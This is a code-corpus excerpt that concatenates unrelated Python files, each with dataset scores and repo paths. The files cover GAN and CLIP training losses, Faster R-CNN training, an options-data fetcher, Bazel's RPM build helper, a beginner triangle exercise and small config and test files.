import numpy as np import torch from torch_utils import training_stats from torch_utils import misc from torch_utils.ops import conv2d_gradfix import torch.nn.functional as F import torchvision.transforms as T import clip import dnnlib import random #---------------------------------------------------------------------------- class Loss: def accumulate_gradients(self, phase, real_img, real_c, gen_z, gen_c, sync, gain, real_features): # to be overridden by subclass raise NotImplementedError() class Model(torch.nn.Module): def __init__(self, device): super(Model, self).__init__() self.linear1 = torch.nn.Linear(512, 1024) self.linear2 = torch.nn.Linear(1024, 1024) self.linear3 = torch.nn.Linear(1024, 1024) self.linear4 = torch.nn.Linear(1024, 512) self.linear5 = torch.nn.Linear(512, 1024) self.linear6 = torch.nn.Linear(1024, 1024) self.linear7 = torch.nn.Linear(1024, 1024) self.linear8 = torch.nn.Linear(1024, 512) self.device = device def forward(self, x): mu = F.leaky_relu(self.linear1(x)) mu = F.leaky_relu(self.linear2(mu)) mu = F.leaky_relu(self.linear3(mu)) mu = self.linear4(mu) std = F.leaky_relu(self.linear5(x)) std = F.leaky_relu(self.linear6(std)) std = F.leaky_relu(self.linear7(std)) std = self.linear8(std) return mu + std.exp()*(torch.randn(mu.shape).to(self.device)) def loss(self, real, fake, temp=0.1, lam=0.5): sim = torch.cosine_similarity(real.unsqueeze(1), fake.unsqueeze(0), dim=-1) if temp > 0.: sim = torch.exp(sim/temp) sim1 = torch.diagonal(F.softmax(sim, dim=1))*temp sim2 = torch.diagonal(F.softmax(sim, dim=0))*temp if 0.<lam < 1.: return -(lam*torch.log(sim1) + (1.-lam)*torch.log(sim2)) elif lam == 0: return -torch.log(sim2) else: return -torch.log(sim1) else: return -torch.diagonal(sim) #---------------------------------------------------------------------------- class StyleGAN2Loss(Loss): def __init__(self, device, G_mapping, G_synthesis, G_mani, D, augment_pipe=None, style_mixing_prob=0.9, r1_gamma=10, pl_batch_shrink=2, pl_decay=0.01, pl_weight=2): super().__init__() self.device = device self.G_mapping = G_mapping self.G_synthesis = G_synthesis self.G_mani = G_mani self.D = D self.augment_pipe = augment_pipe self.style_mixing_prob = style_mixing_prob self.r1_gamma = r1_gamma self.pl_batch_shrink = pl_batch_shrink self.pl_decay = pl_decay self.pl_weight = pl_weight self.pl_mean = torch.zeros([], device=device) clip_model, _ = clip.load("ViT-B/32", device=device) # Load CLIP model here self.clip_model = clip_model.eval() self.mapper = Model(device) self.mapper.load_state_dict(torch.load('./implicit.0.001.64.True.0.0.pth', map_location='cpu')) # path to the noise mapping network self.mapper.to(device) def run_G(self, z, c, sync, txt_fts=None, ): with misc.ddp_sync(self.G_mapping, sync): ws = self.G_mapping(z, c) if self.style_mixing_prob > 0: new_ws = self.G_mapping(torch.randn_like(z), c, skip_w_avg_update=True) with torch.autograd.profiler.record_function('style_mixing'): cutoff = torch.empty([], dtype=torch.int64, device=ws.device).random_(1, ws.shape[1]) cutoff = torch.where(torch.rand([], device=ws.device) < self.style_mixing_prob, cutoff, torch.full_like(cutoff, ws.shape[1])) ws[:, cutoff:] = new_ws[:, cutoff:] with misc.ddp_sync(self.G_synthesis, sync): img = self.G_synthesis(ws, fts=txt_fts) return img, ws def run_D(self, img, c, sync, fts=None): if self.augment_pipe is not None: img = self.augment_pipe(img) with misc.ddp_sync(self.D, sync): logits, d_fts = self.D(img, c, fts=fts) return logits, d_fts def normalize(self): return T.Compose([ T.Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711)), ]) def full_preprocess(self, img, mode='bicubic', ratio=0.5): full_size = img.shape[-2] if full_size < 224: pad_1 = torch.randint(0, 224-full_size, ()) pad_2 = torch.randint(0, 224-full_size, ()) m = torch.nn.ConstantPad2d((pad_1, 224-full_size-pad_1, pad_2, 224-full_size-pad_2), 1.) reshaped_img = m(img) else: cut_size = torch.randint(int(ratio*full_size), full_size, ()) left = torch.randint(0, full_size-cut_size, ()) top = torch.randint(0, full_size-cut_size, ()) cropped_img = img[:, :, top:top+cut_size, left:left+cut_size] reshaped_img = F.interpolate(cropped_img, (224, 224), mode=mode, align_corners=False) reshaped_img = (reshaped_img + 1.)*0.5 # range in [0., 1.] now reshaped_img = self.normalize()(reshaped_img) return reshaped_img def custom_preprocess(self, img, ind, cut_num, mode='bicubic'): # more to be implemented here full_size = img.shape[-2] grid = np.sqrt(cut_num) most_right = min(int((ind%grid + 1)*full_size/grid), full_size) most_bottom = min(int((ind//grid + 1)*full_size/grid), full_size) cut_size = torch.randint(int(full_size//(grid+1)), int(min(min(full_size//2, most_right), most_bottom)), ()) # TODO: tune this later left = torch.randint(0, most_right-cut_size, ()) top = torch.randint(0, most_bottom-cut_size, ()) cropped_img = img[:, :, top:top+cut_size, left:left+cut_size] reshaped_img = F.interpolate(cropped_img, (224, 224), mode=mode, align_corners=False) reshaped_img = (reshaped_img + 1.)*0.5 # range in [0., 1.] now reshaped_img = self.normalize()(reshaped_img) return reshaped_img def contra_loss(self, temp, mat1, mat2, lam): sim = torch.cosine_similarity(mat1.unsqueeze(1), mat2.unsqueeze(0), dim=-1) if temp > 0.: sim = torch.exp(sim/temp) # This implementation is incorrect, it should be sim=sim/temp. # However, this incorrect implementation can reproduce our results with provided hyper-parameters. # If you want to use the correct implementation, please manually revise it. # The correct implementation should lead to better results, but don't use our provided hyper-parameters, you need to carefully tune lam, temp, itd, itc and other hyper-parameters sim1 = torch.diagonal(F.softmax(sim, dim=1))*temp sim2 = torch.diagonal(F.softmax(sim, dim=0))*temp if 0.<lam < 1.: return lam*torch.log(sim1) + (1.-lam)*torch.log(sim2) elif lam == 0: return torch.log(sim2) else: return torch.log(sim1) else: return torch.diagonal(sim) def accumulate_gradients(self, phase, real_img, real_c, gen_z, gen_c, sync, gain, img_fts, txt_fts, lam, temp, gather, d_use_fts, itd, itc, iid, iic, mixing_prob=0.): assert phase in ['Gmain', 'Greg', 'Gboth', 'Dmain', 'Dreg', 'Dboth'] do_Gmain = (phase in ['Gmain', 'Gboth']) do_Dmain = (phase in ['Dmain', 'Dboth']) do_Gpl = (phase in ['Greg', 'Gboth']) and (self.pl_weight != 0) do_Dr1 = (phase in ['Dreg', 'Dboth']) and (self.r1_gamma != 0) # augmentation aug_level_1 = 0.1 aug_level_2 = 0.75 # print(torch.cosine_similarity(img_fts, txt_fts, dim=-1)) mixing_prob = mixing_prob # probability to use img_fts instead of txt_fts random_noise = torch.randn(txt_fts.shape).to(img_fts.device)# + torch.randn((1, 512)).to(img_fts.device) random_noise = random_noise/random_noise.norm(dim=-1, keepdim=True) txt_fts_ = txt_fts*(1-aug_level_1) + random_noise*aug_level_1 txt_fts_ = txt_fts_/txt_fts_.norm(dim=-1, keepdim=True) if txt_fts.shape[-1] == img_fts.shape[-1]: # # Gaussian purterbation img_fts_ = img_fts*(1-aug_level_2) + random_noise*aug_level_2 # learned generation # with torch.no_grad(): # normed_real_full_img = self.full_preprocess(real_img, ratio=0.99) # img_fts_real_full_ = self.clip_model.encode_image(normed_real_full_img).float() # img_fts_real_full_ = img_fts_real_full_/img_fts_real_full_.norm(dim=-1, keepdim=True) # # img_fts_real_full_ = img_fts # img_fts_ = self.mapper(img_fts_real_full_) + img_fts_real_full_ img_fts_ = img_fts_/img_fts_.norm(dim=-1, keepdim=True) if mixing_prob > 0.99: txt_fts_ = img_fts_ elif mixing_prob < 0.01: txt_fts_ = txt_fts_ else: txt_fts_ = torch.where(torch.rand([txt_fts_.shape[0], 1], device=txt_fts_.device) < mixing_prob, img_fts_, txt_fts_) img_img_d = iid # discriminator img_img_c = iic # clip img_txt_d = itd # discriminator img_txt_c = itc # clip temp = temp lam = lam def gather_tensor(input_tensor, gather_or_not): if gather_or_not: world_size = torch.distributed.get_world_size() rank = torch.distributed.get_rank() output_tensor = [torch.zeros_like(input_tensor) for _ in range(world_size)] torch.distributed.all_gather(output_tensor, input_tensor) output_tensor[rank] = input_tensor # # print(torch.cat(output_tensor).size()) return torch.cat(output_tensor) else: return input_tensor txt_fts_all = gather_tensor(txt_fts_, gather) # Gmain: Maximize logits for generated images. if do_Gmain: with torch.autograd.profiler.record_function('Gmain_forward'): gen_img, _gen_ws = self.run_G(gen_z, gen_c, txt_fts=txt_fts_, sync=(sync and not do_Gpl)) # May get synced by Gpl. gen_logits, gen_d_fts = self.run_D(gen_img, gen_c, sync=False, fts=txt_fts_) gen_d_fts_all = gather_tensor(gen_d_fts, gather) training_stats.report('Loss/scores/fake', gen_logits) training_stats.report('Loss/signs/fake', gen_logits.sign()) loss_Gmain = torch.nn.functional.softplus(-gen_logits) # -log(sigmoid(gen_logits)) normed_gen_full_img = self.full_preprocess(gen_img) img_fts_gen_full = self.clip_model.encode_image(normed_gen_full_img) img_fts_gen_full = img_fts_gen_full/img_fts_gen_full.norm(dim=-1, keepdim=True) img_fts_gen_full_all = gather_tensor(img_fts_gen_full, gather) img_fts_all = gather_tensor(img_fts, gather) if img_txt_c > 0.: clip_loss_img_txt = self.contra_loss(temp, img_fts_gen_full_all, txt_fts_all, lam) loss_Gmain = loss_Gmain - img_txt_c*clip_loss_img_txt.mean() if img_img_c > 0.: clip_loss_img_img = self.contra_loss(temp, img_fts_gen_full_all, img_fts_all, lam) loss_Gmain = loss_Gmain - img_img_c*clip_loss_img_img.mean() if img_txt_d > 0.: loss_Gmain = loss_Gmain - img_txt_d*self.contra_loss(temp, gen_d_fts_all, txt_fts_all, lam).mean() if img_img_d > 0.: with torch.no_grad(): _, g_real_d_fts = self.run_D(real_img.detach(), real_c, sync=False, fts=txt_fts_) g_real_d_fts_all = gather_tensor(g_real_d_fts, gather) loss_Gmain = loss_Gmain - img_img_d*self.contra_loss(temp, g_real_d_fts_all, gen_d_fts_all, lam).mean() training_stats.report('Loss/G/loss', loss_Gmain) with torch.autograd.profiler.record_function('Gmain_backward'): loss_Gmain.mean().mul(gain).backward() # Gpl: Apply path length regularization. if do_Gpl: with torch.autograd.profiler.record_function('Gpl_forward'): batch_size = gen_z.shape[0] // self.pl_batch_shrink txt_fts_0 = txt_fts_[:batch_size] txt_fts_0.requires_grad_() gen_img, gen_ws = self.run_G(gen_z[:batch_size], gen_c[:batch_size], txt_fts=txt_fts_0, sync=sync) pl_noise = torch.randn_like(gen_img) / np.sqrt(gen_img.shape[2] * gen_img.shape[3]) with torch.autograd.profiler.record_function('pl_grads'), conv2d_gradfix.no_weight_gradients(): if d_use_fts: pl_grads = torch.autograd.grad(outputs=[(gen_img * pl_noise).sum()], inputs=[gen_ws, txt_fts_0], create_graph=True, only_inputs=True)[0] else: pl_grads = torch.autograd.grad(outputs=[(gen_img * pl_noise).sum()], inputs=[gen_ws], create_graph=True, only_inputs=True)[0] pl_lengths = pl_grads.square().sum(2).mean(1).sqrt() pl_mean = self.pl_mean.lerp(pl_lengths.mean(), self.pl_decay) self.pl_mean.copy_(pl_mean.detach()) pl_penalty = (pl_lengths - pl_mean).square() training_stats.report('Loss/pl_penalty', pl_penalty) loss_Gpl = pl_penalty * self.pl_weight training_stats.report('Loss/G/reg', loss_Gpl) with torch.autograd.profiler.record_function('Gpl_backward'): (gen_img[:, 0, 0, 0] * 0 + loss_Gpl).mean().mul(gain).backward() # Dmain: Minimize logits for generated images. loss_Dgen = 0 if do_Dmain: with torch.autograd.profiler.record_function('Dgen_forward'): gen_img, _gen_ws = self.run_G(gen_z, gen_c, txt_fts=txt_fts_, sync=False) gen_logits, gen_d_fts = self.run_D(gen_img, gen_c, sync=False, fts=txt_fts_) # Gets synced by loss_Dreal. training_stats.report('Loss/scores/fake', gen_logits) training_stats.report('Loss/signs/fake', gen_logits.sign()) loss_Dgen = torch.nn.functional.softplus(gen_logits) # -log(1 - sigmoid(gen_logits)) with torch.autograd.profiler.record_function('Dgen_backward'): loss_Dgen.mean().mul(gain).backward() # Dmain: Maximize logits for real images. # Dr1: Apply R1 regularization. if do_Dmain or do_Dr1: name = 'Dreal_Dr1' if do_Dmain and do_Dr1 else 'Dreal' if do_Dmain else 'Dr1' with torch.autograd.profiler.record_function(name + '_forward'): real_img_tmp = real_img.detach().requires_grad_(do_Dr1) real_logits, real_d_fts = self.run_D(real_img_tmp, real_c, sync=sync, fts=txt_fts_) training_stats.report('Loss/scores/real', real_logits) training_stats.report('Loss/signs/real', real_logits.sign()) loss_Dreal = 0 if do_Dmain: loss_Dreal = torch.nn.functional.softplus(-real_logits) # -log(sigmoid(real_logits)) if img_txt_d > 0.: real_d_fts_all = gather_tensor(real_d_fts, gather) loss_Dreal = loss_Dreal - img_txt_d*self.contra_loss(temp, real_d_fts_all, txt_fts_all, lam).mean() training_stats.report('Loss/D/loss', loss_Dgen + loss_Dreal) loss_Dr1 = 0 if do_Dr1: with torch.autograd.profiler.record_function('r1_grads'), conv2d_gradfix.no_weight_gradients(): r1_grads = torch.autograd.grad(outputs=[real_logits.sum()], inputs=[real_img_tmp], create_graph=True, only_inputs=True)[0] r1_penalty = r1_grads.square().sum([1,2,3]) loss_Dr1 = r1_penalty * (self.r1_gamma / 2) training_stats.report('Loss/r1_penalty', r1_penalty) training_stats.report('Loss/D/reg', loss_Dr1) with torch.autograd.profiler.record_function(name + '_backward'): (real_logits * 0 + loss_Dreal + loss_Dr1).mean().mul(gain).backward() # ----------------------------------------------------------------------------
2.53125
3
lib/oitool/fetchoi.py
stockalgo/oichart
8
16714
<reponame>stockalgo/oichart<filename>lib/oitool/fetchoi.py import time import logging from bandl.nse_data import NseData from influxdb import InfluxDBClient class FetchOI: def __init__(self,source=None,influxdb_client=None,database="oitool",log_path=None,logLevel='info'): """[summary] :param source: stock broker :type source: string, optional :param influxdb_client: influxdb client object, defaults to None :type influxdb_client: object, optional :param database: name of databse, defaults to "oitool" :type database: str, optional :param log_path: log file path, defaults to None :type log_path: str, optional :param logLevel: log level, defaults to 'info' :type logLevel: str, optional :raises Exception: database error/ bandl error """ try: if not influxdb_client: self.client = InfluxDBClient(database=database) else: self.client = influxdb_client self.client.create_database(database) if not source: self.feeder = NseData() else: raise("Sources will be supported in future release") # setting logs if not log_path: log_path = "OItool_logs_"+ time.strftime("%Y-%m-%d_%H-%M-%S") + ".txt" log_file = logging.FileHandler(log_path, 'a') formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') log_file.setFormatter(formatter) log = logging.getLogger() # root logger log.addHandler(log_file) # set the new handler numeric_log_level = getattr(logging, logLevel.upper(), 10) log.setLevel(numeric_log_level) except Exception as err: logging.error('%s raised an error', str(err)) raise Exception("Error occurred in OItool initialization: ",str(err)) def subscribe(self,symbol,level=10): """ To register ticker for data :param symbol: ticker to fetch option data :type symbol: string :param level: number of option strike from ATM :type symbols: interger """ self.symbol = symbol self.level = level def create_influx_data(self,price,option_data,measurement): tags = {"price":price} fields = {} for keys in option_data: fields[str(keys)+" ce"] = option_data[keys]["CE"]["openInterest"] fields[str(keys)+" pe"] = option_data[keys]["PE"]["openInterest"] logging.info(fields) influx_json = [{"measurement": measurement,"tags":tags,"fields":fields}] return influx_json def get_option_data(symbol,strikes=None,expiry_date=None): return self.feeder.get_option_data(symbol=symbol,strikes=strikes,expiry_date=expiry_date) def start(self,interval=90,runtime=21600): """To start fetching data into influxdb :param interval: wait between data capture, defaults to 90 Seconds :type interval: int, optional :param runtime: runtime for script, defaults to 21600 :type runtime: int, optional :raises Exception: InfluxDb error/ bandl error """ if not self.symbol: raise Exception ("Symbol not subscribed.") starttime = time.time() strikes = self.feeder.get_oc_strike_prices(self.symbol,level=self.level) prev_dict = None while(True): try: price,oc_data = self.feeder.get_option_data(self.symbol,strikes=strikes) if prev_dict == oc_data: time.sleep(15) continue else: prev_dict = oc_data formated_data = self.create_influx_data(price,option_data=oc_data,measurement=self.symbol) self.client.write_points(formated_data) except Exception as exc: logging.debug(str(exc)) print("Error Occurred,Don't worry. We try again. Error: ",str(exc)) timenow = time.time() if(timenow - starttime >= runtime): break time.sleep(interval)
2.359375
2
notebooks/HelperFunctions/RunModel.py
hh2110/continual-ml-stocks
0
16715
from sklearn.model_selection import train_test_split from sklearn import metrics from sklearn.metrics import accuracy_score from sklearn.metrics import roc_auc_score import numpy as np import pandas as pd import matplotlib.pyplot as plt def do_ml(merged_df, test_size, ml_model, **kwargs): train_data = merged_df.drop( columns=[ "lagged_poc", "price_date", "label_id", # "Low", # "High", # "Open", # "Close", # "Adj Close", # "positive_poc", "negative_poc", ] ) target = merged_df[["lagged_poc"]] X_train, X_test, y_train, y_test = train_test_split( np.array(train_data), np.array(target), test_size=test_size, random_state=1 ) model = ml_model(**kwargs) # Fit on training data model.fit(X_train, np.ravel(y_train)) # Actual class predictions predictions = model.predict(X_test) confusion_matrix = metrics.confusion_matrix(y_test, predictions) accuracy_score = metrics.accuracy_score(y_test, predictions) # feature importance plot_feature_importance(model, train_data) return confusion_matrix, accuracy_score def plot_feature_importance(model, train_data): featureImportances = model.feature_importances_ fiDF = pd.DataFrame() fiDF["fi"] = featureImportances fiDF["f"] = train_data.columns fiDF = fiDF.sort_values("fi", ascending=False) fiDF.head() nf = 50 plt.rcParams.update({"font.size": 8}) plt.figure(figsize=(8, 4)) plt.plot(fiDF.f.iloc[0:nf], fiDF.fi.iloc[0:nf]) plt.xticks(rotation=90) plt.show()
2.84375
3
tools/build_defs/pkg/make_rpm.py
jpieper-tri/bazel
1
16716
# Copyright 2017 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """A simple cross-platform helper to create an RPM package.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import contextlib import fileinput import os import re import shutil import subprocess import sys from tempfile import mkdtemp # pylint: disable=g-direct-third-party-import from third_party.py import gflags gflags.DEFINE_string('name', '', 'The name of the software being packaged.') gflags.DEFINE_string('version', '', 'The version of the software being packaged.') gflags.DEFINE_string('release', '', 'The release of the software being packaged.') gflags.DEFINE_string('arch', '', 'The CPU architecture of the software being packaged.') gflags.DEFINE_string('spec_file', '', 'The file containing the RPM specification.') gflags.DEFINE_string('out_file', '', 'The destination to save the resulting RPM file to.') # Setup to safely create a temporary directory and clean it up when done. @contextlib.contextmanager def Cd(newdir, cleanup=lambda: True): """Change the current working directory. This will run the provided cleanup function when the context exits and the previous working directory is restored. Args: newdir: The directory to change to. This must already exist. cleanup: An optional cleanup function to be executed when the context exits. Yields: Nothing. """ prevdir = os.getcwd() os.chdir(os.path.expanduser(newdir)) try: yield finally: os.chdir(prevdir) cleanup() @contextlib.contextmanager def Tempdir(): """Create a new temporary directory and change to it. The temporary directory will be removed when the context exits. Yields: The full path of the temporary directory. """ dirpath = mkdtemp() def Cleanup(): shutil.rmtree(dirpath) with Cd(dirpath, Cleanup): yield dirpath def GetFlagValue(flagvalue, strip=True): if flagvalue: if flagvalue[0] == '@': with open(flagvalue[1:], 'r') as f: flagvalue = f.read() if strip: return flagvalue.strip() return flagvalue WROTE_FILE_RE = re.compile(r'Wrote: (?P<rpm_path>.+)', re.MULTILINE) def FindOutputFile(log): """Find the written file from the log information.""" m = WROTE_FILE_RE.search(log) if m: return m.group('rpm_path') return None def CopyAndRewrite(input_file, output_file, replacements=None): """Copies the given file and optionally rewrites with replacements. Args: input_file: The file to copy. output_file: The file to write to. replacements: A dictionary of replacements. Keys are prefixes scan for, values are the replacements to write after the prefix. """ with open(output_file, 'w') as output: for line in fileinput.input(input_file): if replacements: for prefix, text in replacements.items(): if line.startswith(prefix): line = prefix + ' ' + text + '\n' break output.write(line) def Which(program): def IsExe(fpath): return os.path.isfile(fpath) and os.access(fpath, os.X_OK) for path in os.environ['PATH'].split(os.pathsep): filename = os.path.join(path, program) if IsExe(filename): return filename return None class NoRpmbuildFound(Exception): pass def FindRpmbuild(): path = Which('rpmbuild') if path: return path else: raise NoRpmbuildFound() class RpmBuilder(object): """A helper class to manage building the RPM file.""" SOURCE_DIR = 'SOURCES' BUILD_DIR = 'BUILD' TEMP_DIR = 'TMP' DIRS = [SOURCE_DIR, BUILD_DIR, TEMP_DIR] def __init__(self, name, version, release, arch): self.name = name self.version = GetFlagValue(version) self.release = GetFlagValue(release) self.arch = arch self.files = [] self.rpmbuild_path = FindRpmbuild() self.rpm_path = None def AddFiles(self, files): """Add a set of files to the current RPM.""" self.files += files def SetupWorkdir(self, spec_file, original_dir): """Create the needed structure in the workdir.""" # Create directory structure. for name in RpmBuilder.DIRS: if not os.path.exists(name): os.makedirs(name, 0o777) # Copy the files. for f in self.files: dst_dir = os.path.join(RpmBuilder.BUILD_DIR, os.path.dirname(f)) if not os.path.exists(dst_dir): os.makedirs(dst_dir, 0o777) shutil.copy(os.path.join(original_dir, f), dst_dir) # Copy the spec file, updating with the correct version. spec_origin = os.path.join(original_dir, spec_file) self.spec_file = os.path.basename(spec_file) replacements = {} if self.version: replacements['Version:'] = self.version if self.release: replacements['Release:'] = self.release CopyAndRewrite(spec_origin, self.spec_file, replacements) def CallRpmBuild(self, dirname): """Call rpmbuild with the correct arguments.""" args = [ self.rpmbuild_path, '--define', '_topdir %s' % dirname, '--define', '_tmppath %s/TMP' % dirname, '--bb', self.spec_file, ] p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) output = p.communicate()[0] if p.returncode == 0: # Find the created file. self.rpm_path = FindOutputFile(output) if p.returncode != 0 or not self.rpm_path: print('Error calling rpmbuild:') print(output) # Return the status. return p.returncode def SaveResult(self, out_file): """Save the result RPM out of the temporary working directory.""" if self.rpm_path: shutil.copy(self.rpm_path, out_file) print('Saved RPM file to %s' % out_file) else: print('No RPM file created.') def Build(self, spec_file, out_file): """Build the RPM described by the spec_file.""" print('Building RPM for %s at %s' % (self.name, out_file)) original_dir = os.getcwd() spec_file = os.path.join(original_dir, spec_file) out_file = os.path.join(original_dir, out_file) with Tempdir() as dirname: self.SetupWorkdir(spec_file, original_dir) status = self.CallRpmBuild(dirname) self.SaveResult(out_file) return status def main(argv=()): try: builder = RpmBuilder(FLAGS.name, FLAGS.version, FLAGS.release, FLAGS.arch) builder.AddFiles(argv[1:]) return builder.Build(FLAGS.spec_file, FLAGS.out_file) except NoRpmbuildFound: print('ERROR: rpmbuild is required but is not present in PATH') return 1 if __name__ == '__main__': FLAGS = gflags.FLAGS main(FLAGS(sys.argv))
1.890625
2
data/datasets/gb_100.py
CharleyZhao123/graceful-few-shot
1
16717
<filename>data/datasets/gb_100.py import os import pickle import random from torch.utils.data import Dataset from .datasets import dataset_register default_split = { 'train': 0.7, 'val': 0.3, } @dataset_register('gb-100') class GB100(Dataset): def __init__(self, root_path, split='train', split_method='novel', **kwargs): data_file_name = 'gb_dataset.pickle' with open(os.path.join(root_path, data_file_name), 'rb') as f: pack = pickle.load(f, encoding='latin1') # 经过默认数据处理[Resize, ToTensor, normalize]的图像tensor,可直接输入Network default_data = pack['data'] feature = pack['feature'] imgname = pack['imgname'] origin_label = pack['origin_label'] logits = pack['logits'] gb_label = pack['gb_label'] # 划分数据 g_index = [] b_index = [] for i, l in enumerate(gb_label): if l == 1.0: g_index.append(i) else: b_index.append(i) if split_method == 'random': # 随机抽取数据并划分数据 random.seed(0) train_g_index = random.sample(g_index, int( len(g_index)*default_split['train'])) val_g_index = list(set(g_index).difference(set(train_g_index))) random.seed(1) train_b_index = random.sample(b_index, int( len(b_index)*default_split['train'])) val_b_index = list(set(b_index).difference(set(train_b_index))) train_index = train_g_index + train_b_index val_index = val_g_index + val_b_index else: # 前n个class为训练集, 后64-n个为验证集划分数据 t_class_num = int(default_split['train'] * 64) # n v_class_num = 64 - t_class_num train_g_index = g_index[:100*t_class_num] val_g_index = g_index[100*t_class_num:] train_b_index = b_index[:100*t_class_num] val_b_index = b_index[100*t_class_num:] train_index = train_g_index + train_b_index val_index = val_g_index + val_b_index if split == 'train': self.index_list = train_index else: self.index_list = val_index self.data = default_data self.feature = feature self.gb_label = gb_label def __len__(self): return len(self.index_list) def __getitem__(self, i): index = self.index_list[i] return self.data[index], self.feature[index], int(self.gb_label[index]) if __name__ == '__main__': gb_100 = GB100( root_path='/space1/zhaoqing/dataset/fsl/gb-100', split='val', split_method='novel') print(len(gb_100)) # random # val 3840 # train 8960 # novel # val 4000 # train 8800
2.578125
3
examples/analyze-outdated.py
duzvik/project-freta
67
16718
#!/usr/bin/env python # # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # # Re-analyze all images that don't have latest version of the analysis available from freta.api import Freta def main(): freta = Freta() versions = freta.versions() for image in freta.image.list(): if ( image["state"] == "Report available" and image["analysis_version"] != versions["analysis"] ): print("redoing %s" % image["image_id"]) freta.image.analyze(image["image_id"]) if __name__ == "__main__": main()
2.640625
3
utils/utils_fit.py
bubbliiiing/faster-rcnn-keras
282
16719
import numpy as np import tensorflow as tf from keras import backend as K from tqdm import tqdm def write_log(callback, names, logs, batch_no): for name, value in zip(names, logs): summary = tf.Summary() summary_value = summary.value.add() summary_value.simple_value = value summary_value.tag = name callback.writer.add_summary(summary, batch_no) callback.writer.flush() def fit_one_epoch(model_rpn, model_all, loss_history, callback, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, anchors, bbox_util, roi_helper): total_loss = 0 rpn_loc_loss = 0 rpn_cls_loss = 0 roi_loc_loss = 0 roi_cls_loss = 0 val_loss = 0 with tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar: for iteration, batch in enumerate(gen): if iteration >= epoch_step: break X, Y, boxes = batch[0], batch[1], batch[2] P_rpn = model_rpn.predict_on_batch(X) results = bbox_util.detection_out_rpn(P_rpn, anchors) roi_inputs = [] out_classes = [] out_regrs = [] for i in range(len(X)): R = results[i] X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i]) roi_inputs.append(X2) out_classes.append(Y1) out_regrs.append(Y2) loss_class = model_all.train_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)]) write_log(callback, ['total_loss','rpn_cls_loss', 'rpn_reg_loss', 'detection_cls_loss', 'detection_reg_loss'], loss_class, iteration) rpn_cls_loss += loss_class[1] rpn_loc_loss += loss_class[2] roi_cls_loss += loss_class[3] roi_loc_loss += loss_class[4] total_loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss pbar.set_postfix(**{'total' : total_loss / (iteration + 1), 'rpn_cls' : rpn_cls_loss / (iteration + 1), 'rpn_loc' : rpn_loc_loss / (iteration + 1), 'roi_cls' : roi_cls_loss / (iteration + 1), 'roi_loc' : roi_loc_loss / (iteration + 1), 'lr' : K.get_value(model_rpn.optimizer.lr)}) pbar.update(1) print('Start Validation') with tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar: for iteration, batch in enumerate(gen_val): if iteration >= epoch_step_val: break X, Y, boxes = batch[0], batch[1], batch[2] P_rpn = model_rpn.predict_on_batch(X) results = bbox_util.detection_out_rpn(P_rpn, anchors) roi_inputs = [] out_classes = [] out_regrs = [] for i in range(len(X)): R = results[i] X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i]) roi_inputs.append(X2) out_classes.append(Y1) out_regrs.append(Y2) loss_class = model_all.test_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)]) val_loss += loss_class[0] pbar.set_postfix(**{'total' : val_loss / (iteration + 1)}) pbar.update(1) logs = {'loss': total_loss / epoch_step, 'val_loss': val_loss / epoch_step_val} loss_history.on_epoch_end([], logs) print('Epoch:'+ str(epoch+1) + '/' + str(Epoch)) print('Total Loss: %.3f || Val Loss: %.3f ' % (total_loss / epoch_step, val_loss / epoch_step_val)) model_all.save_weights('logs/ep%03d-loss%.3f-val_loss%.3f.h5' % (epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val))
2.296875
2
__init__.py
sbalen/TrafficSignsDataset
1
16720
"""TrafficSignDataset dataset.""" from .TrafficSignsDataset import Trafficsignsdataset
1
1
exercicios-Python/ex042.py
pedrosimoes-programmer/exercicios-python
0
16721
<filename>exercicios-Python/ex042.py #Refaça o DESAFIO 035 dos triângulos, acrescentando o recurso de mostrar que tipo de triângulo será formado: #- EQUILÁTERO: todos os lados iguais #- ISÓSCELES: dois lados iguais, um diferente #- ESCALENO: todos os lados diferentes print('-' * 20, 'Programa Analisador de Triângulos', '-' * 20) seg1 = float(input('Digite o valor do primeiro segmento: ')) seg2 = float(input('Digite o valor do segundo segmento: ')) seg3 = float(input('Digite o valor do terceiro segmento: ')) if seg1 < seg2 + seg3 and seg2 < seg1 + seg3 and seg3 < seg1 + seg2: if seg1 == seg2 and seg3: # outra possibilidade --> seg1 == seg2 == seg3: print('Os segmentos PODEM formar um triângulo do tipo EQUILÁTERO!') elif seg1 != seg2 != seg3 != seg1: print('Os segmentos acima PODEM formar um triângulo do tipo ESCALENO!') else: print('Os segmentos acima PODEM formar um triângulo do tipo ISÓSCELES!') else: print('Os segmentos NÃO PODEM formar um triângulo!')
4.25
4
tests/test_extension.py
PeterWurmsdobler/mopidy-vfd
0
16722
from mopidy_vfd import Extension def test_get_default_config(): ext = Extension() config = ext.get_default_config() assert "[vfd]" in config assert "enabled = true" in config def test_get_config_schema(): ext = Extension() schema = ext.get_config_schema() assert "display" in schema
2.125
2
backend/venv/src/api/ordercampproduct/apps.py
AkashSDas/camps_for_champs
0
16723
<filename>backend/venv/src/api/ordercampproduct/apps.py from django.apps import AppConfig class OrdercampproductConfig(AppConfig): name = 'api.ordercampproduct'
1.390625
1
onnx_tf/handlers/backend/identity.py
ZemingZhao/onnx-tensorflow
0
16724
